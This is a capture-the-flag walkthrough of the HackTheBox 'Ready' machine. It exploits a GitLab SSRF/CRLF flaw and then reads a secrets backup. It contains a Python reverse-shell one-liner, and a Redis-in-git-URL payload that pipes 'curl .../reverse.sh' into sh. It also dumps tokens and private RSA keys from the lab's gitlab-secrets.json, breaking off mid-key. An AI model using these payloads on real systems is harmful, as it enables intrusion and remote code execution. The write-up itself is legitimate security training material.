> ## Documentation Index
> Fetch the complete documentation index at: https://blog.daehyung.dev/llms.txt
> Use this file to discover all available pages before exploring further.

# HackTheBox Ready

> Linux machine walkthrough from enumeration to privilege escalation.

# Enumeration

## Run Nmap Scan

```bash theme={null}
nmap -p- -T4 10.129.227.132

"
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-12 06:08 GMT
Nmap scan report for 10.129.227.132
Host is up (0.013s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
5080/tcp open  onscreen

Nmap done: 1 IP address (1 host up) scanned in 259.63 seconds
"
```

```bash theme={null}
nmap -p 22,5080 -sC -sV 10.129.227.132

"
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-12 06:13 GMT
Nmap scan report for 10.129.227.132
Host is up (0.041s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.129.227.132:5080/users/sign_in
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds
"
```

## **View Website**

Port 5080

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/ready/untitled.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=9fdb7718b7972ccad82371f65dc63742" alt="Untitled" width="1680" height="733" data-path="hackthebox-linux/images/ready/untitled.png" />

Click help button (located at the bottom) and Login to check the version of GitLab

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/ready/untitled-1.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=053bf0418800b53b4ad46b6546eccff5" alt="Untitled" width="1680" height="6007" data-path="hackthebox-linux/images/ready/untitled-1.png" />

Let’s find the vulnerability based on the GitLab Version

# Exploitation

## Testing CRLF Injection

[https://www.youtube.com/watch?v=LrLJuyAdoAg](https://www.youtube.com/watch?v=LrLJuyAdoAg)

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/ready/untitled-2.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=c7e6c9cb80d2499f5c12cf080d9527fe" alt="Untitled" width="1680" height="869" data-path="hackthebox-linux/images/ready/untitled-2.png" />

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/ready/untitled-3.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=f58a26920689d43e1b265e4e3dea923a" alt="Untitled" width="1276" height="869" data-path="hackthebox-linux/images/ready/untitled-3.png" />

```bash theme={null}
nc -lvnp 8000

"
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8000
Ncat: Listening on 0.0.0.0:8000
Ncat: Connection from 10.129.63.66.
Ncat: Connection from 10.129.63.66:41954.
004dgit-upload-pack /hello1 
hello2 
hello3 
/test.githost=10.10.14.56:8000
"
```

> Tip: If the response is different from my burp and if you are not getting any netcat response (Git name error), then try removing all the projects inside your project dashboard!

## CVE-2018-19585 (CRLF)

### Generate Reverse Shell

[Online - Reverse Shell Generator](https://www.revshells.com/)

```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.56",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```

Generate the python3 reverse shell and paste the code into `reverse.sh`

### Listen to Reverse Shell and Exploit

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/ready/untitled-4.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=26303f80022ae22c1487782c1a37b7a5" alt="Untitled" width="1680" height="875" data-path="hackthebox-linux/images/ready/untitled-4.png" />

```
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|curl http://10.10.14.56:8000/reverse.sh | sh\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git
```

**TLDR**; this is a redis command sequence inside a git url that sends a task to background job queues to Redis system and executes malicious tasks

[GitLab 11.4.7 Remote Code Execution](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/)

```bash theme={null}
nc -lvnp 4444

"
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.63.66.
Ncat: Connection from 10.129.63.66:58360.
git@gitlab:~/gitlab-rails/working$
"
```

# Privilege Escalation

## Finding Secrets

```bash theme={null}
ls

"
git@gitlab:/opt/backup$ ls
ls
docker-compose.yml  gitlab-secrets.json  gitlab.rb
"
```

`cat /opt/backup/gitlab-secrets.json`

```json theme={null}
{
  "gitlab_workhorse": {
    "secret_token": "/HvvEvI/T33qyvK1U4jmnfH7fGxzySlzuhewkOR9Zk0="
  },
  "gitlab_shell": {
    "secret_token": "bad62f769ebf4f96f0114e406fa4605eb25cffd8b629bcff8419bb9078df53b42a219186a19d889a2dfb4f10eb65e6cdc3d784cf70f07c3c29947fc6f1523c14"
  },
  "gitlab_rails": {
    "secret_key_base": "b7c70c02d37e37b14572f5387919b00206d2916098e3c54147f9c762d6bef2788a82643d0c32ab1cdb315753d6a4e59271cddf9b41f37c814dd7d256b7a2f353",
    "db_key_base": "eaa32eb7018961f9b101a330b8a905b771973ece8667634e289a0383c2ecff650bb4e7b1a6034c066af2f37ea3ee103227655c33bc17c123c99f421ee0776429",
    "otp_key_base": "b30e7b1e7e65c31d70385c47bc5bf48cbe774e39492280df7428ce6f66bc53ec494d2fbcbf9b49ec204b3ba741261b43cdaf7a191932f13df1f5bd6018458e56",
    "openid_connect_signing_key": "-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----\n"
  },
  "gitlab_pages": {
    "admin_secret_token": "3a78ace47a25031e52d79ff2215ac7cb40354c7e1288ba6f4dcc5322a0b0ef52478027761bfa5a922ca261d14756c8c04a0490e16f46e0e937fae93248f53b77"
  },
  "registry": {
    "http_secret": "2723e7222cdf9490fc3204fcebf7e1150252cdf60c5a2dcca875735b656ba09ae44427eeadffcb842e97286fc9b809c0d9357778b790fd077289bf354d36102a",
    "internal_certificate": "-----BEGIN CERTIFICATE-----\nMIIFBTCCAu2gAwIBAgIBADANBgkqhkiG9w0BAQsFADBGMQwwCgYDVQQGEwNVU0Ex\nDzANBgNVBAoMBkdpdExhYjESMBAGA1UECwwJQ29udGFpbmVyMREwDwYDVQQDDAhS\nZWdpc3RyeTAeFw0yMDA3MDgwODUyMjVaFw0zMDA3MDYwODUyMjVaMEYxDDAKBgNV\nBAYTA1VTQTEPMA0GA1UECgwGR2l0TGFiMRIwEAYDVQQLDAlDb250YWluZXIxETAP\nBgNVBAMMCFJlZ2lzdHJ5MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA\n0q30fBVXzLujZnfjunCqoPLpUGEkDs2mSi60lvLwXBjQt3faxRPP+DmwWewC+3+h\n3lMKnl3ZzHF2g0mOUIDnzU9+kuDii+wZEKGO+eta4yVrE6UiwQki/cQPuDHh7e+n\nFQ+EH3L98z/4z+G9/80B6YPj6Nibv1PLS0gHfGbHJqkQxpe8KsCdcuEjzpPgksWw\nf/TNoSGOBspqckGzCrCUbhQNCKoG+yKylfP44bpQtlYUnXoLBGABxUSuHVwHjhpj\nnApxNkOfiUIVeVJzY3ygBUOeyLj1F2NdLgv3+ga5V8+RH1z1U1nh2FVeicQGGAX9\nXsQpGFcvMndfyBslOqGCSKxovj1Fec3DEmu8GviZQJbRE1h0vuJD7c8vHbVtE3hd\nfQyFie2LEnnqOyxNPHLLSK15T6Icz2M5tHkt3RmCabPaXgSrva5I7WLhDdiIfh9P\nHpopQLnLQeXS71Yckruqe1jiTlI+BuIHg/FkZs+gBMpr81oI2MLMy0CG8UlYPLy+\nWmrSHmkulHcYITkkiHXsPSfki2IWEbQUA/Q0x9s/GWQdz0ufv9osxcBVjnHp1c77\nj8kqIE1w7AVZIaACXvF5at9V3y/0wuyx8oxVMaq1kzYyrQCaOd/bsD1DE6lewt5T\n4m9ReMoS/vcJ+dhSDUzZffynOAJQcrd41h78yEkdU3MCAwEAATANBgkqhkiG9w0B\nAQsFAAOCAgEABSPAUNjBTocj453MfYCt1Srbut+FhQQ+YHTBL/ietfUa4xeULJE5\nRPj9rACJYhr32SsCNub574EVSPIzBFUy4Ux+aWgqcHJilL9l5LmPf5kbmPc9H9Mq\nEUEJe+ee2jwj9myf3JILgdmvj+QqXkx5g/hV/Hlls/L9ABeZ+YpY0fu5JRzuYpdV\ncn45+K9NGrgzmPn8nl5hvl24XRbAqjy42pBbVBZeSJsMBJrqUIu90XQv25cpFNsh\nDNQckVu+3CLHPdn3TpPvTnOG+qkYdppckZqLmx9N9/F2wvONAPIX0b96f2ikU9e/\n9+XSv+Pd2qTaz80gq2d7SVwNFz+JDjejNZ6Dx2iSs3wLUdXo/2I+E8dINcj9d4un\n+MhUBYzQr7yyqZIvZRVxl57BCpuFE6/gpdIXVDkV9+dSUlkEfLB4M7U+i6rio78L\nENqkAhX1KsCaibapmqv0FTmOIVjRgacO9ababfZYVGRUY5yWg1bg2t3VruYcpUqN\nzFxP2TGnjGcfEBAJw5p/HKOG23GWHKzJMz8T1HELm/NzmTII4sumhZxNOmak5zUQ\n/SkzXbN4X6+nEjZWXZ1Y5Z07XV+tvVxMlMIkTE9aHIEqQuI/0zWf2R0f3iq078nE\nmUjVumOe5cN0hfhuYa1EhxdqDPvN0zzEiA5NqlD5vbgQ+0KvgdzKBz0=\n-----END CERTIFICATE-----\n",
    "internal_key": "-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----\n"
  },
  "letsencrypt": {
    "auto_enabled": null
  },
  "mattermost": {
    "email_invite_salt": "8ba431c836b4d9e90a9a699432dd8519",
    "file_public_link_salt": "0d5ad5b9e3135add7e98c8897ef3931c",
    "sql_at_rest_encrypt_key": "e7f6d79dd0dc10882c63eba22a21a416"
  },
  "postgresql": {
    "internal_certificate": "-----BEGIN CERTIFICATE-----\nMIIFBzCCAu+gAwIBAgIBADANBgkqhkiG9w0BAQsFADBHMQwwCgYDVQQGEwNVU0Ex\nDzANBgNVBAoMBkdpdExhYjERMA8GA1UECwwIRGF0YWJhc2UxEzARBgNVBAMMClBv\nc3RncmVTUUwwHhcNMjAwNzA4MDg1MjI2WhcNMzAwNzA2MDg1MjI2WjBHMQwwCgYD\nVQQGEwNVU0ExDzANBgNVBAoMBkdpdExhYjERMA8GA1UECwwIRGF0YWJhc2UxEzAR\nBgNVBAMMClBvc3RncmVTUUwwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC\nAQCzD0w6dY6HwTZn9k9N+4KxKrNuTTIifA34KsiiJn3B6231s4ZxGndGZnQCBnL7\ncG9U11w3z9NNCLuaYaKf09llGEdte9/bV7z/VR/+4Tgnb08kEcYFB2jrbET6wxuH\nliqoMPcgkIe9lU4jXXR6aWCt3c1cu0xoo1lcCtbyHZNxkjO9klTTZOkTwH3GYSzq\nf+4HQ/BC0gN3zhT+GqR0LW341HsAcM75ZhsRt1UZHYCdC0klCKOdSwPX5V6ctCCw\njkr4+8rYvNYGUzjXKG2ff8p7QXeia/luPfl5ihtTj2JglpRQOwc7XnN2DYL7XJnl\nZ6Qi69sjcfR4/tXiVmgRBftd9+o5gjHE6O7DLfjVQhQBBUm962b52g1QEfWRg81C\nqfeOhY7wd3TflLjSZa4RY9B24vAhUmleTKsuvuuxTjbnR26rlds2sOkhNKd9VoUW\nHY2lA7DgMXNl2KpnRF/mtJWBuNGAzGXZ+1W4bgdRmQo6LJaUw3aevWmIOdyXuij/\nBjuhdFeQNT0gkYQy1YEPtmaCKsm7BJ8aSK3XNtPYKyXN+mQWBNTNXFSnaLdFJrlk\nRQ5TnsOOIMX2PIdrfVkZQXMcbTEaAJ9x8OBjXgf50lrM03kHft3GvJWLzmaqJZJJ\nAV33i4lXzMNd+mw8AV6HAxXWkVc4By+ttk7Qjx6aePacewIDAQABMA0GCSqGSIb3\nDQEBCwUAA4ICAQBjldojIyjIssNmYG2z8eDwzXsjlo/Q2G4DYzkqfm13PA0HUh4b\nm7faPn/430qF8vZuCYlREWGzIqV/jvObKoCP0mVd15NgLQoIK04eYrUnWMVvs8YL\nt3Nj77uFP9pRHN12+QRfbz1EkwaGC3AV1fulF6TwfmXRss4c1aurtusOgWTj/eTC\n+GCj5lY3b7RnYBZ6EQ+rPaiaye3yDxHZYOO2HGqGzFxQQvt3XqKycINit8pTA3d5\nNIZTsywBsPL1Pr5+APY4ASfqwSzknzu0G1vQEDq6q4DCx4zPnh50tUs76xPXFz7T\nuTdNUN5L0K58grhnPtinASbfpxFitDS5Y3SVv2oPQjh5K4I6nYp03HNF0as/2+y+\n8y5PKO6DQKBCxaY2u0Ni1RvpWhYVXJroGdSYXYtRg7XYxSwWgRjtzPHEIu/tniSl\nh/6PGWGlMpXYRiOAvOCa2Mzu3PERv9SoM6gCgqWv5GVXRh+3zzQIZaH5ucRzLivF\n8AiIIfnoLmdewiDp9M6jBnzrxFCSSr1P8l6CjEPcWdW6k+WIHipQJ2Dm7v0ixpQh\nKkfhljU6ghZN/oMdj4D+DsxNzBn+OzcAJkfYwigRDJCRTgV9BgB7PuoKTg3lud2c\nGBYzsXR3iThlZMVy2GQHzmW4lYqGhAPGn6ocLSeqMNzcHP6sKwU1oou10g==\n-----END CERTIFICATE-----\n",
    "internal_key": "-----BEGIN RSA PRIVATE KEY-----\nMIIJKQIBAAKCAgEAsw9MOnWOh8E2Z/ZPTfuCsSqzbk0yInwN+CrIoiZ9wett9bOG\ncRp3RmZ0AgZy+3BvVNdcN8/TTQi7mmGin9PZZRhHbXvf21e8/1Uf/uE4J29PJBHG\nBQdo62xE+sMbh5YqqDD3IJCHvZVOI110emlgrd3NXLtMaKNZXArW8h2TcZIzvZJU\n02TpE8B9xmEs6n/uB0PwQtIDd84U/hqkdC1t+NR7AHDO+WYbEbdVGR2AnQtJJQij\nnUsD1+VenLQgsI5K+PvK2LzWBlM41yhtn3/Ke0F3omv5bj35eYobU49iYJaUUDsH\nO15zdg2C+1yZ5WekIuvbI3H0eP7V4lZoEQX7XffqOYIxxOjuwy341UIUAQVJvetm\n+doNUBH1kYPNQqn3joWO8Hd035S40mWuEWPQduLwIVJpXkyrLr7rsU4250duq5Xb\nNrDpITSnfVaFFh2NpQOw4DFzZdiqZ0Rf5rSVgbjRgMxl2ftVuG4HUZkKOiyWlMN2\nnr1piDncl7oo/wY7oXRXkDU9IJGEMtWBD7ZmgirJuwSfGkit1zbT2CslzfpkFgTU\nzVxUp2i3RSa5ZEUOU57DjiDF9jyHa31ZGUFzHG0xGgCfcfDgY14H+dJazNN5B37d\nxryVi85mqiWSSQFd94uJV8zDXfpsPAFehwMV1pFXOAcvrbZO0I8emnj2nHsCAwEA\nAQKCAgBQPeXCONYznfE8q5OkdbZ+oI0iO/Pgokk8UifxCmDG2zM+rUHtQ5f584W/\nNpameR9bHNuVo0uktOolZ+WRzEUa2cOAm8eYqvvmTIZ3GQSqH2aO2mwr6sMo5S8Q\nVQjsPO5GyxKkBEDgQ51tmb7N8JVDtScHjGPUbIdqCO2EOJ7PgV4wcPgUd58/m76B\nfSC8wbGwjdCIkUa+lJqxuMzDx2wF22p3qxYFi61LxiWbiK4PMnSH5RQ1M924DXDV\ntp8Dn/CXHXcso4sh8H+DY/mkRYc+rvrmzY5MyfcXcT2Ht7S1ZiV2ws0d3NjPKYTu\nEfRhao2SnLFqc/HDmyfMMz6VimG3XReUgcQkB+SUsifTELUeXxdmqZau2FT0I9YV\nT3BiJyJoe8HW5HPBtITIItCA8RTW3wfipvqQEECzkRwQwKPKRcdLrTzQHjdLSiXX\nORFl/4NzLQHd/AO3V38mcHNJCbZhD8SyKsBEMKNpn5hIHAOFYV5ul6R/Xon2EAta\nvhOT2BTKmkUkpul0NXRc0aFWG58ITjQcINUMoBs+C9QGc8uS3N8VfD1q4tSpy/cW\nXf/Em29ZG8I+T31UzTjuX8m2Qe05vYJ1nsv/ZgP25EdLMM28opbaSbzJ57ckHiyI\nK6y4NLsGMA6O4xgaJfFHNqxvPY5QpVzqEuLkNEVNv1Lh0wvXqQKCAQEA58x/gJa5\nhRfx3QIGn8aprMFUmWnosSd4LmfS+eJFj7oDXXYWYop+OsaToTyKrZ6F23NKe6v+\nX/uyNID3RD/xCYwqEefuA87+cVr6Zk+qyBhi8loE/dVXN